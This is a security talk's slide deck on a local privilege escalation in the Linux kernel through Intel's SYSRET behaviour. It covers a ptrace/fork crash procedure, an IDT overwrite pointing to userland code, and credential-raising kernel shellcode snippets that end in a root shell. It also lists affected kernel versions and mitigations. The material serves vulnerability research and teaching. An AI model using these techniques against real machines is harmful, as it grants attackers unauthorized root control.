Exploiting the Linux Kernel via Intel's SYSRET Implementation

Exploiting the Linux Kernel via
Intel's SYSRET Implementation
Niko@FluxFingers

Outline
● Syscalls and Context Switches
● Canonical Addresses
● SYSRET #GP Triggering
● Step by Step Exploitation and Rooting

Linux x86_64 Syscalls
● On OLD x86 Processors int $0x80 with Nr. in %eax
and Params in %ebx, %ecx, etc
○ However it’s super slow and got replaced with Intel’s
SYSENTER mechanism
● x86_64 uses AMD’s SYSCALL with Params in %rdi, %
rsi, %rdx, %rcx, ...
○ Faster to handle than the whole interrupt path
○ Intel CPUs adapted SYSCALL according to AMD’s specs since it
became the standard syscall-mechanism

SYSCALL/SYSRET
● Whenever a syscall is invoked via SYSCALL a
context switch to kernel mode takes place
○ When leaving the syscall the kernel needs to restore specific
userland registers
○ And transfer back to ring3 with SYSRET
● SYSRET is fast since it “only” needs to:
○ Load the saved %rip from %rcx
○ Swap %cs back to ring3 mode
● The kernel itself has to make sure to restore all other
userland registers before executing SYSRET

SYSCALL/SYSRET
0x0000000000000000
0x0000000000400000
Process (/bin/cat)
.text, .data, .bss, Heap
0x00000000006XXXXX
Shared Libraries
0x00007ffffXXXXXXX
Stack
0x00007fXXXXXXXXXX
VSYSCALL
0xffffffffff600000
0xffffffff80000000
Kernel Memory
SYSCALL

SYSCALL/SYSRET
0x0000000000000000
0x0000000000400000
Process (/bin/cat)
.text, .data, .bss, Heap
0x00000000006XXXXX
Shared Libraries
0x00007ffffXXXXXXX
Stack
0x00007fXXXXXXXXXX
VSYSCALL
0xffffffffff600000
0xffffffff80000000
Kernel Memory
SYSRET

How Linux handles SYSRET
● arch/x86/kernel/entry_64.S:
ret_from_sys_call:
movl $_TIF_ALLWORK_MASK,%edi
...
sysret_check:
...
movq RIP-ARGOFFSET(%rsp),%rcx
CFI_REGISTER rip,rcx
RESTORE_ARGS 1,-ARG_SKIP,0
movq PER_CPU_VAR(old_rsp), %rsp
USERGS_SYSRET64
● The kernel makes sure to restore %rsp and %gs etc
and calls SYSRET in the end

Canonical Addresses
● On x86_64 registers are 64 bit wide
● The instruction pointer (%rip) can only use 48 bits
○ 48 Bits == balanced value for page-tables/accessible memory
● Leftover bits of %rip used for CPU specific tricks
○ like NX bit on position 63
● Meaning the value of %rip has to be “canonical” aka
between
○ 0x0000000000000000 -> 0x00007FFFFFFFFFFF
○ 0x00FFFFFFFFFFFFFF -> 0xFFFF800000000000
● (Bits 48 .. 63 have to be copies of bit 47)
● Non-canonical values in %rip are not allowed and will
trigger exceptions in certain cases

Non-canonical addresses and SYSRET
● Whenever a SYSRET is executed and the CPU sees
a non-canonical value in %rcx it triggers a #GP
● AMD specs however never defined when the #GP
will actually happen
● Clever researches at XEN found out AMD CPUs will
trigger #GP when back in Usermode
● Not so on Intel ...

Intel’s Version of SYSRET
● AMD’s specs omitted the check for non-canonical
values in %rcx / %rip
● Intel decided to check for non-canonical values
before the privilege level is changed

Intel’s Version of SYSRET
● Triggering a #GP from kernel mode has
consequences on Linux
● Recall that prior to executing SYSRET Linux
restores the userland %rsp and swaps %gs
● Intel’s SYSRET will #GP on the userland stack while
still being in ring0

#GP on userland %rsp
● #GP is an exception reached via an IDT entry:
arch/x86/kernel/traps.c:
set_intr_gate(X86_TRAP_GP, general_protection);
● Where general_protection resolves to an error_entry macro in
arch/x86/kernel/entry_64.S:
.macro errorentry sym do_sym
ENTRY(sym)
XCPT_FRAME
ASM_CLAC
PARAVIRT_ADJUST_EXCEPTION_FRAME
subq $ORIG_RAX-R15, %rsp
CFI_ADJUST_CFA_OFFSET ORIG_RAX-R15
call error_entry
...

● error_entry sets up an exception stack and backups all registers:
ENTRY(error_entry)
XCPT_FRAME
CFI_ADJUST_CFA_OFFSET 15*8
cld
movq_cfi rdi, RDI+8
movq_cfi rsi, RSI+8
movq_cfi rdx, RDX+8
…
● where movq_cfi is defined as
.macro movq_cfi reg offset=0
movq %reg, offset(%rsp)
CFI_REL_OFFSET reg, offset
.endm

● When setting up the stack frame in error_entry all
(general) registers are saved to x(%rsp) / [rsp+x]
● The kernel restored the userland %rsp and
registers before SYSRET
● => Arbitrary memory write while in ring0
● Classic possibility for privilege escalation

Linux’ Protection against n/c %rip
● This behaviour already bit Linux in 2006 (CVE-
2006-0744)
● To make sure no code lands up in non-canonical
address space (or right before) a guard page was
introduced
● mmap(0x7ffffffff000, 4096, PROT_READ … will
return ENOMEM
● This way SYSRET “shouldn’t” return to any n/c
address

Linux’ Protection against n/c %rip
● Another possibility is using a “safe” IRET path for
returning back to ring3
○ IRET requires ring3-backup on the stack to return to user-code
○ Is slower than SYSRET
● The ptrace interface sets an IRET path most of the
time
● However some syscalls use a SYSRET path albeit
being ptraced
● One example is fork() since it signals with
ptrace_event() that does not force IRET

Crash PoC
● fork() a child
● Child sets PTRACE_TRACEME
● Raise SIGSTOP
● Parent sets PTRACE_O_TRACEFORK
● Child fork()s again
● Parent catches this fork
● And uses PTRACE_SETREGS to set %rip to n/c
● Pivots %rsp to arbitrary place
● And PTRACE_CONTINUEs
● fork() will return with SYSRET with n/c %rcx
● CPU will #GP, Pagefault, Doublefault and Panic

The plan
● We need to get Kernel Code Execution between
the #GP and Panic
● Then restore the damage we have done
● Set credentials of current process to 0
● Return back to userland
● And open shell

The target
● Since #GP will always trigger a Pagefault and
Doublefault we can pivot %rsp back to IDT
● And set 2 specific registers to craft a fake IDT gate
● That will be placed instead of the orig Page- or
Doublefault handler.

IDT Layout
● We can read IDTR with the sidt-instruction

IDT Gate Entry
● And setup a new gate with modified “Offsets”

The target
● Before we trigger #GP we can allocate a Landing
Area in Userland
● Where we copy code that will be executed
● Craft a fake IDT gate that points to this area
● Triggering #GP will then overwrite e.g. Doublefault
with the fake gate
● And the kernel will jump to Userland and execute
our code with kernel privs

Kernel Shellcode
● Inside this code we will have to swapgs in order to
access kernel structures
● Then we carefully rebuild all IDT entries that were
trashed in the overwrite process
● Then we can raise process credentials

Process structures
● Each process in userland has an associated kernel
structure (thread_union) that builds the kernel
stack:
thread_union
thread_info
Kernel Stack

Process structures
● thread_info itself has an element that points to
task_struct
thread_info
*task_struct
*exec_domain
…

Process structures < 2.6.29
● task_struct contains lots of info about the running
task
● and its credentials
task_struct
state
stack
usage
...
uid, guid, caps,...

Process structures < 2.6.29
task_struct
state
stack
usage
...
uid, guid, caps,...
thread_info
*task_struct
*exec_domain
…
thread_union
thread_info
Kernel Stack

Kernel Shellcode
● On < 2.6.29 raising process credentials is a matter
of finding uid, gid and caps in task_struct
● And patching them to 0
● Luckily %gs in kernel mode contains offset to
x8664_pda (/include/asm-x86/pda.h)
/* Per processor datastructure. %gs points to it while the kernel runs */
struct x8664_pda {
struct task_struct *pcurrent; /* 0 Current process */
unsigned long data_offset; /* 8 Per cpu data offset from linker address */
unsigned long kernelstack; /* 16 top of kernel stack for current */
unsigned long oldrsp; /* 24 user rsp for system call */
int irqcount; /* 32 Irq nesting counter. Starts with -1 */
int cpunumber; /* 36 Logical CPU number */
#ifdef CONFIG_CC_STACKPROTECTOR
unsigned long stack_canary;
...

Kernel Shellcode
● %gs:0 will point to task_struct
● So we can simply:
asm("movq %%gs:0, %0" : "=r"(ptr));
cred = (uint32_t *)ptr;
for (i = 0; i < 1000; i++, cred++) {
if (cred[0] == uid && cred[1] == uid && cred[2] == uid && cred[3] == uid &&
cred[4] == gid && cred[5] == gid && cred[6] == gid && cred[7] == gid) {
cred[0] = cred[1] = cred[2] = cred[3] = 0;
cred[4] = cred[5] = cred[6] = cred[7] = 0;
● Where uid/gid are getuid() and getdid()
● And our process will be root

Kernel Shellcode
● On > 2.6.29 x8664_pda is removed
● And task_struct contains a new member called
cred (credential records)
● If %rsp wasn’t modified we could walk back to top
of stack to find thread_info
● And do heuristic scanning to find thread_info-
>task_struct->creds->uid/gid
● However with credential records come two new
functions
● prepare_kernel_cred / commit_creds

Kernel Shellcode
● prepare_kernel_cred creates a new clean
credentials structure
● commit_creds installs the new cred to the current
task
● Both symbols are exported through /proc/kallsyms
or /boot/System.map
● Kernel shellcode just needs to
commit_creds(prepare_kernel_cred(0));
● And we’re root again

Kernel Shellcode
● Next we will have to cleanly return back to
userland
● Easiest method is to use IRET:
__asm__ __volatile__(
"movq %0, 0x20(%%rsp);"
"movq %1, 0x18(%%rsp);"
"movq %2, 0x10(%%rsp);"
"movq %3, 0x08(%%rsp);"
"movq %4, 0x00(%%rsp);"
"swapgs;"
"iretq;"
:: "i"(USER_SS),
"i"(user_stack),
"i"(USER_FL),
"i"(USER_CS),
"i"(user_code)
);
● Where user_code points to memory in userland
that should be executed when kernel exits

Popping uid=0(root)
● user_code can do anything now since it runs as
root
● So we can simply execve(/bin/sh) from there
● However that happens inside the child so we have
to bring the rootshell back to the parent
● Or we just chmod() or setxattr() to drop a root-shell

Liminations
● These techniques work well with 2.6.18 - 3.9.X
3.10 mitigates the IDT attack by remapping it to
rodata (arch/x86/kernel/traps.c)
__set_fixmap(FIX_RO_IDT, __pa_symbol(idt_table), PAGE_KERNEL_RO);
idt_descr.address = fix_to_virt(FIX_RO_IDT);
● CPUs with SMAP/SMEP will detect accessing
userland code while still being in ring0
● Grsecurity will provide handful of protections to
make this bug a pain to exploit
○ GRKERNSEC_RANDSTRUCT
○ PAX_MEMORY_UDEREF
○ GRKERNSEC_HIDESYM
○ ...

Further thoughts
● Linux fix is weird (“only” forces ptrace_stop() to
use IRET)
● Syscalls can still return via SYSRET
● Also bug within SYSRET is still present
● Since it’s a hardware issue it might be present in
other OSes in different variations (OHAI 2006)
● Any1 wanna check FreeBSD …?

Exploiting the Linux Kernel via Intel's SYSRET Implementation

Recommandé

Recommandé

Contenu connexe

Tendances

Tendances (20)

Similaire à Exploiting the Linux Kernel via Intel's SYSRET Implementation

Similaire à Exploiting the Linux Kernel via Intel's SYSRET Implementation (20)

Dernier

Dernier (20)

Exploiting the Linux Kernel via Intel's SYSRET Implementation